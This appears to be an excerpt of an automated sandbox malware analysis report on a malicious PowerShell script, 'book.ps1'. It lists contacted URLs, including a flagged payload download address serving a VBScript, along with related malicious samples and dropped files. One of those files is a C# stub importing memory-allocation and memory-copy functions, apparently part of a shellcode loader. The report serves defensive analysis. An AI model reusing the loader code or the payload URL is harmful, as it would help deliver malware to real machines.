          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$powershell.exe, 00000003.00000002.301030775.00000167FFDE7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281332697.00000167FFDE2000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.318892077.00000211B6EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282944131.00000167E7731000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://46.4.198.55/10P/Sursdepa.vbs0yjpowershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://46.4.198.55/10P/Sursdepa.vpowershell.exe, 00000003.00000002.292149897.00000167E848D000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://go.microspowershell.exe, 00000001.00000002.323271463.00000211B7732000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://46.4.198.55xpowershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		low

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  46.4.198.55
                  		unknownGermany
                  		24940HETZNER-ASDEfalse

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:623683
                  Start date and time: 10/05/202218:43:152022-05-10 18:43:15 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 4s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:book.ps1
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:21
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal72.troj.evad.winPS1@13/19@0/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 48
                  • Number of non-executed functions: 1
                  Cookbook Comments:
                  • Found application associated with file extension: .ps1
                  • Adjust boot time
                  • Enable AMSI

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Execution Graph export aborted for target powershell.exe, PID 3144 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 6276 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 6344 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: book.ps1

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  18:44:38API Interceptor106x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  46.4.198.55EnricoDoc.dotmGet hashmaliciousBrowse
                  • 46.4.198.55/10P/book.ps1
                  Tab2.dotmGet hashmaliciousBrowse
                  • 46.4.198.55/Tab2/book.ps1

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  HETZNER-ASDEEnricoDoc.dotmGet hashmaliciousBrowse
                  • 46.4.198.55
                  e8CkCfHRUx.exeGet hashmaliciousBrowse
                  • 136.243.172.101
                  FAX Voice Caller - B.xllGet hashmaliciousBrowse
                  • 144.76.136.153
                  fax - Payment - B.xllGet hashmaliciousBrowse
                  • 144.76.136.153
                  Neue Bestellung.exeGet hashmaliciousBrowse
                  • 144.76.136.153
                  SWIFT10.05.2022 ,pdf.exeGet hashmaliciousBrowse
                  • 88.99.36.203
                  ez.apkGet hashmaliciousBrowse
                  • 94.130.163.40
                  ez.apkGet hashmaliciousBrowse
                  • 94.130.163.40
                  https://theknowledgeburrow.com/did-the-captain-of-the-titanic-ignore-iceberg-warnings/#:~:text=How%20many%20warnings%20did%20Titanic%20receive%20about%20icebergs,that%20a%20nearby%20vessel%20was%20stuck%20in%20iceGet hashmaliciousBrowse
                  • 78.47.72.67
                  FxXd0Vefx1.exeGet hashmaliciousBrowse
                  • 144.76.120.25
                  Installer.exeGet hashmaliciousBrowse
                  • 176.9.247.226
                  z3hir.armGet hashmaliciousBrowse
                  • 116.202.237.198
                  RSX.exeGet hashmaliciousBrowse
                  • 195.201.253.119
                  1isequal9.mipsGet hashmaliciousBrowse
                  • 5.9.114.250
                  MtBDy2a3nQ.exeGet hashmaliciousBrowse
                  • 136.243.172.101
                  1isequal9.i486Get hashmaliciousBrowse
                  • 94.130.231.156
                  1isequal9.armGet hashmaliciousBrowse
                  • 144.79.12.250
                  Factura n#U00ba 220111826N.xlsxGet hashmaliciousBrowse
                  • 5.161.106.232
                  Facturan#U00ba220111826N.xlsxGet hashmaliciousBrowse
                  • 5.161.106.232
                  SecuriteInfo.com.Trojan.DownLoader44.58468.21897.exeGet hashmaliciousBrowse
                  • 144.76.136.153

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):11606
                  Entropy (8bit):4.889221124293713
                  Encrypted:false
                  SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib4fe2Ca6pZlR:dMib4T4YLiib4fxopbjvwRjdvRTniQ0P
                  MD5:DBAF0AC6B37CA6806A1C4AF9DF83C99D
                  SHA1:68AC141D6D56D93B52C81C0F18B26A5B9755A79F
                  SHA-256:1DF55044C6D8EDFF49DA570CD306B0BE68A3D97DCEE02A5D417DB5223D3AA543
                  SHA-512:B5F0DA77EF5AEE08E55E12DAA7FA0BF631A77D4F94F17951D8ADB3D38CA81743862F90D3C232F9E75D701E2A823A4BE39BA3D1689631816D40C15E455CB38C46
                  Malicious:false
                  Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1200
                  Entropy (8bit):5.318432830754259
                  Encrypted:false
                  SSDEEP:24:3UCPpQrLAo4KAxX5qRPD42HOoFe9t4CvKaBPnKdr+q:lPerB4nqRL/HvFe9t4CvpBfur+q
                  MD5:D7F10739CE94FBBD93A1C0724A750BDB
                  SHA1:4E5FFBF85D29084A0BD94B1E067109BFF1B527CE
                  SHA-256:5311F389A445AC225504B04B4653867DB1D811838A4118075C94409AF3B77FE1
                  SHA-512:C4BFEA1462B2EF412013956C63859F5433EB38A3F9FB1158CA375D0DD412E284519E2E489A104F8D794CF3920955870A1AD5EA65133F248434BFF972007CCAC8
                  Malicious:false
                  Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

                  C:\Users\user\AppData\Local\Temp\RES5295.tmp

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                  Category:dropped
                  Size (bytes):1328
                  Entropy (8bit):3.9821202951451133
                  Encrypted:false
                  SSDEEP:24:HVe9EuZfW8jJXDfH4hKEbsmfII+ycuZhNmdo5akSfdoOPNnq9qd:cB3zaKPmg1ulSaa3FBq9K
                  MD5:505A72B275501CAC0414CE22B67825FA
                  SHA1:9DAFB6870CAA22AB16A3D0B6865799DC8C17BF8E
                  SHA-256:707741E78DCD26E29FACB6B79FD9B9DF25B4639BF3FF07F18BD0CA9BB233BFD0
                  SHA-512:5D7777248EB7D0DC6AB1031E71595810A8E5124FB3E12C8D59D670DAE2F604C621E8178604ACB7A6AD4849E60B24A1652D9FD043F3B503029C77E68C64C77C0A
                  Malicious:false
                  Preview:L....zb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP.................\C......c91...5..........4.......C:\Users\user\AppData\Local\Temp\RES5295.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.t.g.0.3.2.l.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31atpqyt.iuu.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eghthspv.xqw.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhyqppvk.wu3.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gstzwz1n.ooj.ps1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqfeipil.5om.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymlh0dzf.0zd.psm1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.098629909666731
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryMdo5ak7YnqqfdoOPN5Dlq5J:+RI+ycuZhNmdo5akSfdoOPNnqX
                  MD5:EB5C43059DA31ED5EC6339319EA48835
                  SHA1:F2759B61893FFD40EAFA4863CD0EDB8E5533EAFA
                  SHA-256:36DB6AD58A67ABA40B090C2078CB6642E8CEB5D7CAD3194C4D2DB8EE92026D78
                  SHA-512:AE9528866B8F3276A81C1C26A1138E6AA14B6D32FBA7D4B7BDE46C9F862595ABDB7AC4E2CF3C574628E34330923F131ED83E2CC52CC0D0FDA3C816C7C04E96EB
                  Malicious:false
                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.t.g.0.3.2.l.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.t.g.0.3.2.l.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                  C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.0.cs

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):487
                  Entropy (8bit):5.236532790609796
                  Encrypted:false
                  SSDEEP:12:V/DGr0nHWP7xReX6Sq76zSPRHC9ftAnHCARHpWfOQAKaD:JowWPFRI6SZzSlC9ftErpWhAV
                  MD5:56B3B782DBCC5028A8050646F2177FB1
                  SHA1:8B819399A5BC15644D6B81D5438A7B78E34662FC
                  SHA-256:A4DC022E81A07FEDD233869623B65353C72084C6C7971DA2F4A222F2C2223A3A
                  SHA-512:93F796C7CA68AAA78D3EA1C35E97C1C1FC5CE13ED528856DF53BF84FD254E6D2165D0A1122F321008C1DE4EEB00B4B3AFFDB23E5A95709F42305413011BB1A8B
                  Malicious:false
                  Preview:.using System;..using System.Runtime.InteropServices;..public static class Hexastich1..{..[DllImport("KERNEL32")]public static extern void RtlMoveMemory(IntPtr Bagfuls51,ref Int32 Bagfuls52,int Bagfuls53);..[DllImport("ntdll.dll", EntryPoint="NtAllocateVirtualMemory")]public static extern int VA(int Hexastich6,ref Int32 Semire,int Bagfuls5,ref Int32 Hexastich,int Print8,int Hexastich7);..[DllImport("USER32")]public static extern IntPtr EnumWindows(uint Bagfuls55,int Bagfuls56);..}

                  C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.254565368001567
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fGn5KD+zxs7+AEszIwkn23fGn5KEA:p37Lvkmb6KRfunED+WZEifunEEA
                  MD5:C6D26A2F306341082CF3D4E7FE29F1DB
                  SHA1:80B6461E5F02D3AF63A84876CAE261BF417449F7
                  SHA-256:37DB437489762A0FFBA8E3460F514DA4CA87533F3D7ACBF3997D09B96466D5CB
                  SHA-512:AECFBCF1B206F50F18589DD09E13E28AD6FF36C8FFCB1DFE60F845D8CBA4609947E292542BC4F9D802C151C82B67CBB375B1BFFBBCF758F24BB9C0CE2DD6DD8F
                  Malicious:false
                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.0.cs"

                  C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dll

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.800737969834327
                  Encrypted:false
                  SSDEEP:48:6vblYoGZQu4xKsf9BFZwUvT1ulSaa3FBq:GlYoGuu4xJ1cNK
                  MD5:DD7A380DE44D9286DD26DD2996C0119C
                  SHA1:779B8187C01D83714ABFA4CFA6C3BC159EF525FF
                  SHA-256:A488A4BAA44C85FA03F307108179B0A0A6E4BB2C208944650E487F14F5CB57CF
                  SHA-512:1456C98428191BDBE6D478C58F32EFE62B44F5B686A3432CE5B834ACE66B74DF29D80EEA11EEE034E5C01D92F875CF70F89D0E62C82C0C9FBF0B1C5327D59A88
                  Malicious:false
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....zb...........!................n$... ...@....... ....................................@..................................$..S....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P$......H.......P ..............................................................BSJB............v4.0.30319......l...X...#~..........#Strings....T.......#US.\.......#GUID...l...\...#Blob...........G.........%3............................................................2.+...............K.,.................................... 9............ G............ J.........V.....`.....j.....t...............................................$.....).!...-.....2.....;.^.g.......9.......q.......J.....

                  C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.out

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):867
                  Entropy (8bit):5.327239025067284
                  Encrypted:false
                  SSDEEP:24:KJBqd3ka6KRfWED/EifWEE1KaM5DqBVKVrdFAMBJTH:Cika6CPEuiKxDcVKdBJj
                  MD5:6E9FACBC3733F6688707044FD9EB4413
                  SHA1:5116961171A3A26EEF1904F64FA3C673E5652EC9
                  SHA-256:2E5429B9AF5EBBB0C796C185B4CCCA5485814C2DA15FFAF85973914F62E5888D
                  SHA-512:9A91BAC986C3C713E80B4E168880C5E21293D02111041806A97718858464EC492000B797B485F4B35FB5C0DDD092757CD938F2B2BB53F811DDA228C128558824
                  Malicious:false
                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6205
                  Entropy (8bit):3.7489766835293885
                  Encrypted:false
                  SSDEEP:48:k437m9LiF10CYUHl8qjeukvhkvklCywPs1ozQ8/nSogZofM1ozQ8/nSogZozH:kIm9mF10CReqDkvhkvCCtUuQBH3uQBH2
                  MD5:BBE10FD90F7662CE71B0F0E2EB9640AE
                  SHA1:D3F05A11EE8D45F9F239E3F45DCA2CDD373D7DAE
                  SHA-256:F2E0E8100642DA826976A9A787AEB399D6534E8A8292910403CE43250E45B41B
                  SHA-512:E793E1AC424D261DE162930BECFB77AF7DBEEBD209DBCB4B4BC7B724136518586835B8DE2BCDDF51878351680ED9AC1FB885E150CD7F1F687E496A9E9E0E8943
                  Malicious:false
                  Preview:...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-....P..2..w..8.d......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...T.......Y....................yN|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...T.......Y.....................K..R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N...T.......Y.....................sJ.M.i.c.r.o.s.o.f.t.....V.1.....hTjM..Windows.@.......N...T.......Y....................d...W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...T.......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N...T.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N..hTKM.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5U6NMO9ACOK0QV40NE2D.temp

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6205
                  Entropy (8bit):3.7489766835293885
                  Encrypted:false
                  SSDEEP:48:k437m9LiF10CYUHl8qjeukvhkvklCywPs1ozQ8/nSogZofM1ozQ8/nSogZozH:kIm9mF10CReqDkvhkvCCtUuQBH3uQBH2
                  MD5:BBE10FD90F7662CE71B0F0E2EB9640AE
                  SHA1:D3F05A11EE8D45F9F239E3F45DCA2CDD373D7DAE
                  SHA-256:F2E0E8100642DA826976A9A787AEB399D6534E8A8292910403CE43250E45B41B
                  SHA-512:E793E1AC424D261DE162930BECFB77AF7DBEEBD209DBCB4B4BC7B724136518586835B8DE2BCDDF51878351680ED9AC1FB885E150CD7F1F687E496A9E9E0E8943
                  Malicious:false
                  Preview:...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-....P..2..w..8.d......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...T.......Y....................yN|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...T.......Y.....................K..R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N...T.......Y.....................sJ.M.i.c.r.o.s.o.f.t.....V.1.....hTjM..Windows.@.......N...T.......Y....................d...W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...T.......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N...T.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N..hTKM.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........

                  C:\Users\user\Desktop\Sursdepa.vbs

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ISO-8859 text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):236358
